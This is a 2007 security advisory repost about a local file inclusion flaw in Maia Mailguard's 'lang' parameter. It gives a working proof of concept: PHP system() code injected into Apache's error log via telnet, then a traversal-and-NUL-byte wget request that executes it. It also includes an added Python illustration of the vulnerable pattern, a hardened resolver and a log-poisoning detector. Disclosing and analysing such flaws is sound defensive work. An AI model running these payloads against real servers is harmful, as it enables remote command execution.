Monday, July 09, 2007

[UNIX] Maia Mailguard Arbitrary Code Execution

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com


- - - - - - - - -

Maia Mailguard Arbitrary Code Execution
------------------------------------------------------------------------


SUMMARY

<http://www.miamailguard.com> "Maia Mailguard is a web-based interface and
management system based on the popular amavisd-new e-mail scanner and
SpamAssassin. Written in Perl and PHP, Maia Mailguard gives end-users
control over how their mail is processed by virus scanners and spam
filters, while giving mail administrators the power to configure site-wide
defaults and limits." A directory traversal vulnerability in the Maia
Mailguard web application lets an attacker make the application include an
arbitrary local file, and through that execute arbitrary commands on the
affected system.

DETAILS

Vulnerable Systems:
* Maia Mailguard version 1.0.2 and prior (FreeBSD)

Improper input validation of the "lang" parameter in the Maia Mailguard web
application results in a directory traversal (local file inclusion)
vulnerability. It can be used to read arbitrary files on the affected
system or, by including a file whose contents the attacker controls, to
execute arbitrary commands on the affected system.

Proof of Concept:
1) The attacker first plants PHP code in the httpd-error.log file by
connecting to port 80 on the affected system and sending a malformed request
line whose "method" is the payload ("get <CODE HERE>"). Apache rejects the
request with 400 Bad Request but writes the offending line to its error log.
See example below:

the-wretched:~ simon$ telnet maiatest.snosoft.com 80
Trying 10.0.0.128...
Connected to maiatest.snosoft.com.
Escape character is '^]'.

get <pre>><?php system('ls -laf /var/log');?>

HTTP/1.1 400 Bad Request
Date: Wed, 20 Jun 2007 21:31:58 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28
OpenSSL/0.9.7e-p1
Connection: close
Content-Type: text/html; charset=iso-8859-1

2) Once the code is in the log file, the attacker gets it executed by making
the web application include that file through the traversal. The trailing
%00 is a NUL byte: the application sees a value that ends in ".txt", but the
C library calls that PHP's file operations relied on at the time stop at the
first NUL, so the file actually opened is httpd-error.log (PHP removed this
truncation in 5.3.4). The included PHP then runs with the web server's
privileges. Below is an example of code execution:

the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/login.php?lang=./../../../../../../../../../../../../var/log/httpd-error.log%00.txt
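
The two-step PoC above depends on two things: a path check that runs on the full string while the C library underneath stops at the NUL, and a web-server log the attacker can write into. The Python below is an added illustration, not code from Maia Mailguard or from the Netragard advisory: it models the vulnerable include pattern (a hypothetical reconstruction, not Maia's real source) against the advisory's own lang payload, shows the allow-listed resolver a developer would replace it with, and flags the poisoned error-log line an incident responder would look for. The install path, the language allow-list and the error-log line format are assumptions made for the example.

```python
import re
import posixpath
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumed install layout and allow-list (the page does not give Maia's real paths).
LANG_DIR = "/usr/local/www/maia/lang"
ALLOWED_LANGS = {"en", "de", "fr", "es"}
LANG_RE = re.compile(r"^[a-z]{2}(?:_[A-Z]{2})?$")

# The request from step 2 of the advisory, verbatim.
POC_URL = ("http://maiatest.snosoft.com/maia/login.php?lang="
           "./../../../../../../../../../../../../var/log/httpd-error.log%00.txt")


def lang_from_url(url: str) -> str:
    """Extract and percent-decode the lang value the way the web stack would;
    %00 turns into a real NUL byte inside the string."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("lang", [""])[0]


def legacy_resolve(lang: str) -> Optional[str]:
    """Hypothetical model of the vulnerable pattern (not Maia's actual code):
    accept any value ending in '.txt', glue it under LANG_DIR and hand the
    result to open(2).  The suffix check runs on the full string, but a C path
    ends at the first NUL, so we return what the OS would really open."""
    if not lang.endswith(".txt"):
        return None
    requested = LANG_DIR + "/" + lang
    seen_by_libc = requested.split("\0", 1)[0]   # PHP < 5.3.4 behaved this way
    return posixpath.normpath(seen_by_libc)


def safe_resolve(lang: str) -> Optional[str]:
    """Hardened resolver: allow-list first, then build the path from the
    vetted code (never from raw input) and confirm it is still inside LANG_DIR."""
    if "\0" in lang or not LANG_RE.match(lang) or lang not in ALLOWED_LANGS:
        return None
    path = posixpath.normpath(posixpath.join(LANG_DIR, lang + ".txt"))
    if posixpath.commonpath([LANG_DIR, path]) != LANG_DIR:
        return None   # unreachable after the allow-list; kept as defence in depth
    return path


# Constructed error-log lines in the style of Apache 1.3 (format approximated,
# not copied from a live server); the second is what step 1 leaves behind.
SAMPLE_ERROR_LOG = [
    "[Wed Jun 20 21:31:50 2007] [error] [client 10.0.0.5] File does not exist: /usr/local/www/favicon.ico",
    "[Wed Jun 20 21:31:58 2007] [error] [client 10.0.0.5] Invalid method in request get <pre>><?php system('ls -laf /var/log');?>",
]
POISON_RE = re.compile(r"<\?(?:php\b|=)|<script\b", re.IGNORECASE)


def poisoned_log_lines(lines):
    """Responder's check: a PHP or script tag inside a web-server log is a sign
    that someone is staging a log-poisoning file inclusion like the one above."""
    return [line for line in lines if POISON_RE.search(line)]


if __name__ == "__main__":
    lang = lang_from_url(POC_URL)
    print("decoded lang contains NUL:", "\0" in lang)
    print("vulnerable pattern opens:", legacy_resolve(lang))
    print("hardened resolver opens:", safe_resolve(lang))
    print("hardened resolver for 'en':", safe_resolve("en"))
    print("poisoned log lines:", len(poisoned_log_lines(SAMPLE_ERROR_LOG)))
```

Run against the PoC value, legacy_resolve returns /var/log/httpd-error.log even though the value ends in ".txt", which is exactly the "asking for one file and getting another" the vendor describes; safe_resolve returns None for it and only ever yields paths built from an allow-listed code. The containment check is redundant once the allow-list is in place, but it is the line that keeps the fix intact if someone later relaxes the allow-list.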

Vendor Status:
Vendor has been notified and was quick to resolve the issue.

Vendor Comments:
"The only addition that I had was that it seems to only affect systems
like FreeBSD... It would be nice to nail that down. I suspect the root
security issue is really with the PHP and file-system interaction... my
patch just simply works around and blocks the root problem. From my
developer point of view, I'm asking for one file and the file-system is
giving us something else. That's a serious risk. If we could at least
express that concern, I think that would be prudent.

Chicken and egg problem, I was kinda waiting on you to post our own
ticket, but.... I can add a comment afterwards. OK. Here's our ticket
which also references the changeset:
<http://www.maiamailguard.org/maia/ticket/479>

A unified patch may be retrieved from:
<http://www.maiamailguard.org/maia/changeset/1184?format=diff&new=1184>

David Morton"


ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@netragard.com>
Netragard Security Advisories.
The original article can be found at:
<http://www.netragard.com/pdfs/research/NETRAGARD-20070628-MAILGUARD.txt>

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
